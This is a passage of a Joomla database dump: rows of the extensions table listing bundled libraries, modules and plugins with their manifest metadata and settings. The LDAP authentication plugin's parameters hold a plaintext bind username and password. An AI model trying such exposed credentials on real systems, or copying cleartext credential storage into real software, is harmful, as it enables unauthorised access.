00:00:00',0,0),(101,'SimplePie','library','simplepie','',0,1,1,1,'{\"name\":\"SimplePie\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"SimplePie\",\"copyright\":\"Copyright (c) 2004-2009, Ryan Parman and Geoffrey Sneddon\",\"authorEmail\":\"\",\"authorUrl\":\"http:\\/\\/simplepie.org\\/\",\"version\":\"1.2\",\"description\":\"LIB_SIMPLEPIE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(102,'phputf8','library','phputf8','',0,1,1,1,'{\"name\":\"phputf8\",\"type\":\"library\",\"creationDate\":\"2006\",\"author\":\"Harry Fuecks\",\"copyright\":\"Copyright various authors\",\"authorEmail\":\"hfuecks@gmail.com\",\"authorUrl\":\"http:\\/\\/sourceforge.net\\/projects\\/phputf8\",\"version\":\"0.5\",\"description\":\"LIB_PHPUTF8_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(103,'Joomla! Platform','library','joomla','',0,1,1,1,'{\"name\":\"Joomla! Platform\",\"type\":\"library\",\"creationDate\":\"2008\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"http:\\/\\/www.joomla.org\",\"version\":\"13.1\",\"description\":\"LIB_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{\"mediaversion\":\"e665d8e61b76f349eae67f437c02195c\"}','','',0,'0000-00-00 00:00:00',0,0),(104,'IDNA Convert','library','idna_convert','',0,1,1,1,'{\"name\":\"IDNA Convert\",\"type\":\"library\",\"creationDate\":\"2004\",\"author\":\"phlyLabs\",\"copyright\":\"2004-2011 phlyLabs Berlin, http:\\/\\/phlylabs.de\",\"authorEmail\":\"phlymail@phlylabs.de\",\"authorUrl\":\"http:\\/\\/phlylabs.de\",\"version\":\"0.8.0\",\"description\":\"LIB_IDNA_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(105,'FOF','library','fof','',0,1,1,1,'{\"name\":\"FOF\",\"type\":\"library\",\"creationDate\":\"2014-03-09 12:54:48\",\"author\":\"Nicholas K. Dionysopoulos \\/ Akeeba Ltd\",\"copyright\":\"(C)2011-2014 Nicholas K. Dionysopoulos\",\"authorEmail\":\"nicholas@akeebabackup.com\",\"authorUrl\":\"https:\\/\\/www.akeebabackup.com\",\"version\":\"2.2.1\",\"description\":\"LIB_FOF_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(106,'PHPass','library','phpass','',0,1,1,1,'{\"name\":\"PHPass\",\"type\":\"library\",\"creationDate\":\"2004-2006\",\"author\":\"Solar Designer\",\"copyright\":\"\",\"authorEmail\":\"solar@openwall.com\",\"authorUrl\":\"http:\\/\\/www.openwall.com\\/phpass\\/\",\"version\":\"0.3\",\"description\":\"LIB_PHPASS_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(200,'mod_articles_archive','module','mod_articles_archive','',0,1,1,0,'{\"name\":\"mod_articles_archive\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters.\\n\\t\\tAll rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_ARCHIVE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(201,'mod_articles_latest','module','mod_articles_latest','',0,1,1,0,'{\"name\":\"mod_articles_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_NEWS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(202,'mod_articles_popular','module','mod_articles_popular','',0,1,1,0,'{\"name\":\"mod_articles_popular\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(203,'mod_banners','module','mod_banners','',0,1,1,0,'{\"name\":\"mod_banners\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BANNERS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(204,'mod_breadcrumbs','module','mod_breadcrumbs','',0,1,1,1,'{\"name\":\"mod_breadcrumbs\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_BREADCRUMBS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(205,'mod_custom','module','mod_custom','',0,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(206,'mod_feed','module','mod_feed','',0,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(207,'mod_footer','module','mod_footer','',0,1,1,0,'{\"name\":\"mod_footer\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FOOTER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(208,'mod_login','module','mod_login','',0,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(209,'mod_menu','module','mod_menu','',0,1,1,1,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(210,'mod_articles_news','module','mod_articles_news','',0,1,1,0,'{\"name\":\"mod_articles_news\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_NEWS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(211,'mod_random_image','module','mod_random_image','',0,1,1,0,'{\"name\":\"mod_random_image\",\"type\":\"module\",\"creationDate\":\"July 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RANDOM_IMAGE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(212,'mod_related_items','module','mod_related_items','',0,1,1,0,'{\"name\":\"mod_related_items\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_RELATED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(213,'mod_search','module','mod_search','',0,1,1,0,'{\"name\":\"mod_search\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SEARCH_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(214,'mod_stats','module','mod_stats','',0,1,1,0,'{\"name\":\"mod_stats\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(215,'mod_syndicate','module','mod_syndicate','',0,1,1,1,'{\"name\":\"mod_syndicate\",\"type\":\"module\",\"creationDate\":\"May 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SYNDICATE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(216,'mod_users_latest','module','mod_users_latest','',0,1,1,0,'{\"name\":\"mod_users_latest\",\"type\":\"module\",\"creationDate\":\"December 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_USERS_LATEST_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(217,'mod_weblinks','module','mod_weblinks','',0,1,1,0,'{\"name\":\"mod_weblinks\",\"type\":\"module\",\"creationDate\":\"July 2009\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WEBLINKS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(218,'mod_whosonline','module','mod_whosonline','',0,1,1,0,'{\"name\":\"mod_whosonline\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WHOSONLINE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(219,'mod_wrapper','module','mod_wrapper','',0,1,1,0,'{\"name\":\"mod_wrapper\",\"type\":\"module\",\"creationDate\":\"October 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_WRAPPER_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(220,'mod_articles_category','module','mod_articles_category','',0,1,1,0,'{\"name\":\"mod_articles_category\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORY_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(221,'mod_articles_categories','module','mod_articles_categories','',0,1,1,0,'{\"name\":\"mod_articles_categories\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_ARTICLES_CATEGORIES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(222,'mod_languages','module','mod_languages','',0,1,1,1,'{\"name\":\"mod_languages\",\"type\":\"module\",\"creationDate\":\"February 2010\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LANGUAGES_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(223,'mod_finder','module','mod_finder','',0,1,0,0,'','','','',0,'0000-00-00 00:00:00',0,0),(300,'mod_custom','module','mod_custom','',1,1,1,1,'{\"name\":\"mod_custom\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_CUSTOM_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(301,'mod_feed','module','mod_feed','',1,1,1,0,'{\"name\":\"mod_feed\",\"type\":\"module\",\"creationDate\":\"July 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_FEED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(302,'mod_latest','module','mod_latest','',1,1,1,0,'{\"name\":\"mod_latest\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LATEST_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(303,'mod_logged','module','mod_logged','',1,1,1,0,'{\"name\":\"mod_logged\",\"type\":\"module\",\"creationDate\":\"January 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGGED_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(304,'mod_login','module','mod_login','',1,1,1,1,'{\"name\":\"mod_login\",\"type\":\"module\",\"creationDate\":\"March 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_LOGIN_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(305,'mod_menu','module','mod_menu','',1,1,1,0,'{\"name\":\"mod_menu\",\"type\":\"module\",\"creationDate\":\"March 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(307,'mod_popular','module','mod_popular','',1,1,1,0,'{\"name\":\"mod_popular\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(308,'mod_quickicon','module','mod_quickicon','',1,1,1,1,'{\"name\":\"mod_quickicon\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_QUICKICON_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(309,'mod_status','module','mod_status','',1,1,1,0,'{\"name\":\"mod_status\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"(C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATUS_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(310,'mod_submenu','module','mod_submenu','',1,1,1,0,'{\"name\":\"mod_submenu\",\"type\":\"module\",\"creationDate\":\"Feb 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_SUBMENU_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(311,'mod_title','module','mod_title','',1,1,1,0,'{\"name\":\"mod_title\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TITLE_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(312,'mod_toolbar','module','mod_toolbar','',1,1,1,1,'{\"name\":\"mod_toolbar\",\"type\":\"module\",\"creationDate\":\"Nov 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_TOOLBAR_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',0,0),(313,'mod_multilangstatus','module','mod_multilangstatus','',1,1,1,0,'{\"name\":\"mod_multilangstatus\",\"type\":\"module\",\"creationDate\":\"September 2011\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_MULTILANGSTATUS_XML_DESCRIPTION\",\"group\":\"\"}','{\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(314,'mod_version','module','mod_version','',1,1,1,0,'{\"legacy\":false,\"name\":\"mod_version\",\"type\":\"module\",\"creationDate\":\"January 2012\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2012 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"2.5.0\",\"description\":\"MOD_VERSION_XML_DESCRIPTION\",\"group\":\"\"}','{\"format\":\"short\",\"product\":\"1\",\"cache\":\"0\"}','','',0,'0000-00-00 00:00:00',0,0),(315,'mod_stats_admin','module','mod_stats_admin','',1,1,1,0,'{\"name\":\"mod_stats_admin\",\"type\":\"module\",\"creationDate\":\"July 2004\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"MOD_STATS_XML_DESCRIPTION\",\"group\":\"\"}','{\"serverinfo\":\"0\",\"siteinfo\":\"0\",\"counter\":\"0\",\"increase\":\"0\",\"cache\":\"1\",\"cache_time\":\"900\",\"cachemode\":\"static\"}','','',0,'0000-00-00 00:00:00',0,0),(316,'mod_tags_popular','module','mod_tags_popular','',0,1,1,0,'{\"name\":\"mod_tags_popular\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_POPULAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"maximum\":\"5\",\"timeframe\":\"alltime\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(317,'mod_tags_similar','module','mod_tags_similar','',0,1,1,0,'{\"name\":\"mod_tags_similar\",\"type\":\"module\",\"creationDate\":\"January 2013\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.1.0\",\"description\":\"MOD_TAGS_SIMILAR_XML_DESCRIPTION\",\"group\":\"\"}','{\"maximum\":\"5\",\"matchtype\":\"any\",\"owncache\":\"1\"}','','',0,'0000-00-00 00:00:00',0,0),(400,'plg_authentication_gmail','plugin','gmail','authentication',0,0,1,0,'{\"name\":\"plg_authentication_gmail\",\"type\":\"plugin\",\"creationDate\":\"February 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_GMAIL_XML_DESCRIPTION\",\"group\":\"\"}','{\"applysuffix\":\"0\",\"suffix\":\"\",\"verifypeer\":\"1\",\"user_blacklist\":\"\"}','','',0,'0000-00-00 00:00:00',1,0),(401,'plg_authentication_joomla','plugin','joomla','authentication',0,1,1,1,'{\"name\":\"plg_authentication_joomla\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_AUTH_JOOMLA_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',0,0),(402,'plg_authentication_ldap','plugin','ldap','authentication',0,0,1,0,'{\"name\":\"plg_authentication_ldap\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LDAP_XML_DESCRIPTION\",\"group\":\"\"}','{\"host\":\"\",\"port\":\"389\",\"use_ldapV3\":\"0\",\"negotiate_tls\":\"0\",\"no_referrals\":\"0\",\"auth_method\":\"bind\",\"base_dn\":\"\",\"search_string\":\"\",\"users_dn\":\"\",\"username\":\"admin\",\"password\":\"bobby7\",\"ldap_fullname\":\"fullName\",\"ldap_email\":\"mail\",\"ldap_uid\":\"uid\"}','','',0,'0000-00-00 00:00:00',3,0),(403,'plg_content_contact','plugin','contact','content',0,1,1,0,'{\"name\":\"plg_content_contact\",\"type\":\"plugin\",\"creationDate\":\"January 2014\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.2.2\",\"description\":\"PLG_CONTENT_CONTACT_XML_DESCRIPTION\",\"group\":\"\"}','','','',0,'0000-00-00 00:00:00',1,0),(404,'plg_content_emailcloak','plugin','emailcloak','content',0,1,1,0,'{\"name\":\"plg_content_emailcloak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_EMAILCLOAK_XML_DESCRIPTION\",\"group\":\"\"}','{\"mode\":\"1\"}','','',0,'0000-00-00 00:00:00',1,0),(405,'plg_content_geshi','plugin','geshi','content',0,0,1,0,'{\"legacy\":false,\"name\":\"plg_content_geshi\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2013 Open Source Matters. All rights reserved.\",\"authorEmail\":\"\",\"authorUrl\":\"qbnz.com\\/highlighter\",\"version\":\"2.5.0\",\"description\":\"PLG_CONTENT_GESHI_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',2,0),(406,'plg_content_loadmodule','plugin','loadmodule','content',0,1,1,0,'{\"name\":\"plg_content_loadmodule\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_LOADMODULE_XML_DESCRIPTION\",\"group\":\"\"}','{\"style\":\"none\"}','','',0,'0000-00-00 00:00:00',0,0),(407,'plg_content_pagebreak','plugin','pagebreak','content',0,1,1,0,'{\"name\":\"plg_content_pagebreak\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_CONTENT_PAGEBREAK_XML_DESCRIPTION\",\"group\":\"\"}','{\"title\":\"1\",\"multipage_toc\":\"1\",\"showall\":\"1\"}','','',0,'0000-00-00 00:00:00',4,0),(408,'plg_content_pagenavigation','plugin','pagenavigation','content',0,1,1,0,'{\"name\":\"plg_content_pagenavigation\",\"type\":\"plugin\",\"creationDate\":\"January 2006\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_PAGENAVIGATION_XML_DESCRIPTION\",\"group\":\"\"}','{\"position\":\"1\"}','','',0,'0000-00-00 00:00:00',5,0),(409,'plg_content_vote','plugin','vote','content',0,1,1,0,'{\"name\":\"plg_content_vote\",\"type\":\"plugin\",\"creationDate\":\"November 2005\",\"author\":\"Joomla! Project\",\"copyright\":\"Copyright (C) 2005 - 2014 Open Source Matters. All rights reserved.\",\"authorEmail\":\"admin@joomla.org\",\"authorUrl\":\"www.joomla.org\",\"version\":\"3.0.0\",\"description\":\"PLG_VOTE_XML_DESCRIPTION\",\"group\":\"\"}','{}','','',0,'0000-00-00 00:00:00',6,0),(410,'plg_editors_codemirror','plugin','codemirror','editors',0,1,1,1,'{\"name\":\"plg_editors_codemirror\",\"type\":\"plugin\",\"creationDate\":\"28 March 2011\",\"author\":\"Marijn 